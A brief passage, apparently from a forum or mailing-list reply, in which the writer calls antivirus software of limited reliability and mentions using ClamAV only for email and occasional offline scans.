That's (one reason) why AV programs are only of limited use, and can't
be relied upon. I only ever use AV software (Clam) for email scanning
and occasional off-line scans.